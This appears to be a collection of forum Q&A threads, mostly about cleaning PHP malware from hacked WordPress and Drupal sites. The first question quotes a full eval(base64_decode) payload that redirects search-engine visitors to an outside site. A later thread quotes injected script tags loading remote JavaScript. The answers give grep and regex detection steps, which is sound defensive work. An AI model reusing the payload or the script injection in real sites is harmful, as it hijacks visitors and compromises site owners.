Pattern to find malicious code starting with eval(base64_decode - wordpress

I've been having issues on my server with the following PHP inserted in all of my Drupal and Wordpress sites.
I have downloaded a full backup of my sites and will clean them all before changing my ftp details and reuploading them again. Hopefully this should clear things up.
My question is:
Using Notepad++ is there a *.* style search criteria I could use to scan my backup files and delete the lines of malicious code without having to do them all individually on my local machine?
This would clearly save me loads of time. Up to now, I've been replacing the following code with blank but the eval code varies on each of my sites.
eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29nbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImxpdmUuY29tIilvciBzdHJpc3RyKCRyZWZlcmVyLCJhcG9ydCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm5pZ21hIikgb3Igc3RyaXN0cigkcmVmZXJlciwid2ViYWx0YSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJlZ3VuLnJ1Iikgb3Igc3RyaXN0cigkcmVmZXJlciwic3R1bWJsZXVwb24uY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYml0Lmx5Iikgb3Igc3RyaXN0cigkcmVmZXJlciwidGlueXVybC5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC5ydVwveWFuZHNlYXJjaFw/KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmwvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vY29zdGFicmF2YS5iZWUucGwvIik7DQpleGl0KCk7DQp9DQp9DQp9DQp9"));

I would change your FTP details immediately. You don't want them hosting warez or something if they have been able to work out the password.
Then shutdown your site so that your visitors are not subjected to any scripts or hijacks.
As far as searching goes a regex like this should sort it out:
eval\(base64_decode\("[\d\w]+"\)\);

I've also had the same problem with my WordPress blogs, eval base64_decode hack. The php files were being injected with those eval lines. I suggest you reinstall wordpress/drupal, as some other scripts may already be present in your site, then change all passwords.
Try running grep through ssh, eg. grep -r -H "eval base64_decode". It'll show you which files are infected. Then if you have time, automate the process so you will be notified in case it happens again.
And in the future, always update WordPress/Drupal.

It's easier if you can use special tools to remove this malicious code, because it could be tricky to find the actual regex to match all the code and you never know if that worked, or you broken your site. Especially when you've multiple files, you should identify the suspicious files by the following commands:
grep -R eval.*base64_decode .
grep -R return.*base64_decode .
but it could be not enough, so you should consider using these PHP security scanners.
For more details, check: How to get rid of eval-base64_decode like PHP virus files?.
For Drupal, check also: How to remove malicious scripts from admin pages after being hacked?

Related

Script being injected into the top of all my wordpress page

Just noticed ads appearing on one of our Wordpress sites. Nailed it down to these scripts being injected into the top of every page:
<script language="javascript" type="text/javascript" src="http://www.mde86.org/jquery.min.Js"></script><div style="display:none"><script language="javascript" type="text/javascript" src="http://js.users.51.la/18658151.js"></script>
Been looking at all the files and database for hours and can't figure out what is injecting it or how it got there.
What we found so far:
Some random lines in the function.php that were handling posts /
gets. We removed those but that didn't seem to solve the issue.
We found a wordpress user that no one has apparently created. So we removed that.
Reset all passwords on wordpress and FTP access
When we load a copy of the site on our local setup it doesn't display the ads or load the scripts... Almost like it can detect / target the live site?
But we still can't find where or how the script is being injected.
Any help greatly appreciated.
Someone had a similar issue here but unfortunately removed their post so only the cached remains:
http://webcache.googleusercontent.com/search?q=cache:US-HRpncY-QJ:stackoverflow.com/questions/33398784/script-being-injected-into-the-top-of-all-my-wordpress-page+&cd=1&hl=en&ct=clnk&gl=au
The same thing happened to a client of mine in the last 24 hours or so.
Can you share some information about the plugins you use and wordpress version?
The file influencing this is wp-admin/setup-config.php. It has encrypted bash code. I also found two admin users generated in wp_users. I think it's obvious that it's an automated attack, but it's pretty sophisticated.
I found the code on some random website via google search. You can review it here: http://tmp.mongit.com/tools/core.txt - It seems to be a shell file, but I'm not really smart when it comes to websec.
On my client's server I also found crap in a root /tmp/ folder (cPanel) that was being somehow accessed by wp_redirect (referenced in pluggable.php line 1196). These files are holding some MySQL info and WP database queries in JSON format. Not really sure how and why these files exist.
[29-Oct-2015 02:45:59 UTC] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/xxx/public_html/wp-admin/setup-config.php(514) : eval()'d code(1) : eval()'d code:2) in /home/xxx/public_html/wp-includes/pluggable.php on line 1196
Try to narrow down the injection source.
Disable plugins one at a time
Switch to a different theme
Check .htaccess files
Test against server generated injections
Test against browser generated injections
had the same issue few hours ago.
Finally found at root wordpress "index.php" at first line injected script calling, the script is calling a file at same directory, the name staretd with .xxxxx like a .htaccess, so it's hidden for example in TCMD.
Cleared the line and deleted the file, now all ok.
But how the hell somebody could control index.pho I don't know....

From where wp ecommerce is loading plugin theme files?

I updated my checkout page by updating mostly the file which was in ....wp-ecommerce/wpsc-theme/wpsc-shopping_cart_page.php
It worked fine for a while, but now some of the changed states reverted to the previous state. Actually, I can even delete the file that I mentioned above, so it means wordpress is loading this file from somewhere else. Any ideas from where and what had happened? Thanks for your help.
Although I don't have a specific answer to your question, if you use an IDE (like Dreamweaver or Eclipse) you could grab a copy of your sites code to your local PC and do a code search for something that is unique to that page.
Ie, if there is a <div class="a_unique_div"> tag somewhere on that page and you know it's only visible on that page, search the code for that and it may give you a clue what file is being used for the output. Even if it's only used on 1 or 2 pages it may bring you closer to working it out.
Alternatively, if you have SSH access you could try and "grep" for the code by SSHing into your server and running a command like:
grep -i -R '<div class="a_unique_div">' /www/your_wp_folder/
(where /www/your_wp_folder/ is the path to your WordPress installation)
Though for this you'll need SSH access, grep installed on the server, etc, so it may not be a viable option.
Good luck!

Drupal multi-site to single-site go-live

I have a colleague asking me to provide a single tarball containing an entire Drupal site, which they can drop on their server with no configuration beyond connecting the database.
To my knowledge this is not possible.
To further complicate the issue, the site is currently developed as a multi-site install and the colleague needs it provided as a single-site install. This is a conversion I've done countless times, but I've always completed the process on the destination environment, because Drupal multi-sites need a proper domain pointed at them to function. There's no way for me to confirm that the site will work at the new location without actually testing it on that environment first, so I don't think I can fulfill this request.
Am I missing something? Is this in fact possible to achieve?
I don't see why this isn't possible.
In regards to the drop in install, as long as you include the settings.php file and a copy of the DB that they import, that is all they should need as long as their webserver is configured properly (such as pretty URLs and the like). Certainly their are a few considerations to take when doing this, you need to make sure the DB connection path is done in relation to localhost (or however they have it) and that when you tarball it together, that you have the right permissions set up for the destination machine, otherwise though, moving a drupal install is really not that difficult and can be just that simple.
Depending upon how 'drop in' they want it, you could write a little script to automate and verify the install. Have the script import a copy of the DB, redo the permissions and owner of the files on destination host, and reload apache.
As far as the multi-site to single site is concerned, I would just do the conversion in a sandbox and set up the domain you need in /etc/hosts (as shown here). This will simulate the destination domain well enough that you can make sure the install is working before sending it off.
Hope that helps.

Help with potential trojan passed through site

So I'm pretty sure my site's been infected with some kind of trojan or virus that attached itself to the scripting within the site. Every time I try and update my Drupal-based site, I get a white screen with this stupid "i'mhere" message. Upon reload, the changes will take affect but I don't know what this is doing once changes are saved. This only pops up while adminstering the site, I.E. posting new content, activating/deactivating modules etc.
Problem is, I haven't the faintest idea how or where to go to remove this. The source code doesn't make reference to any malicious code. It isn't the iFrame link kind of trojan that I've seen brought up through trying to find an answer to this problem.
Things I've tried:
-Scanned computer multiple times for virus (supposedly these things attack insecure FTP data & hijack your client to upload malicious code)
-Changed FTP credentials
-Changed admin user passwords to the backend of the site (Drupal login)
-Updated Drupal
Nothing's worked so far and I'm at my wit's end trying to figure this out. Any tips in the right direction would be greatly appreciated.
Assuming the problem is really Drupal, first check to see if there's some code in a module somewhere firing during a form submit. If you have shell access and it's a Unix/Linux/etc.-based server, navigate to the Drupal directory and run:
grep -r "i\'mhere" *
This will tell you if it exists in code and what file contains it. If it's a module (likely), disable it and either see if there's an update or modify it yourself.
If it's not in code, check your database. Create a dump of your database, and run:
cat databasedump.sql | grep "i\'mhere"
Where databasedump.sql is the name of the database dump you just created. This should at least give you a general idea of what table the data exists in. Then, you can decide how you want to proceed: restore from a previous backup, delete the offending data, etc.
If it's not in either, it might be local. Check with others to see if it's occurring for them.
If it's not local, you've got something really nasty and hopefully someone else has some other ideas on what you can check. :)
Here are a list of potentially useful tools which can help you alleviate, reduce or prevent a virus infection:
bdcored chkrootkit clamd drwebd ipfw iptables kav lidsadm
logcheck logwatch ninja nod32 ossec portsentry rkhunter
sav sawmill shieldcc snort sxid sysmask tcplodg tripwire
uvscan wormscan zmbscap
It is coming straight out of an infamous backdoor malicious software, described on this stackoverflow article.
You may want to manually search for other instances of the virus by running this simple command:
[~] grep -r "base64_decode" .
as suggested in this RAT infection article on thegothicparty.com:
http://thegothicparty.com/dev/article/server-side-virus-rat/

Is there any way I could get this behavior with cURL?

I am testing one of my server implementations and was wondering if I could make curl get embedded content? I mean, when a browser loads a page, it downloads all associated content too... Can someone please tell me how to do this with curl?
I don't mind if it dumps even the binary data onto the terminal... I am trying to benchmark my server (keeping it simple initially to test for bugs... probably after this, I will use one of those dedicated tools like ab)...
wget --page-requisites
This option causes Wget to download
all the files that are necessary to
properly display a given HTML page.
if you want to download recursively, use wget with -r option, instead of curl. also check out the wget man page to get certain types of files.

Resources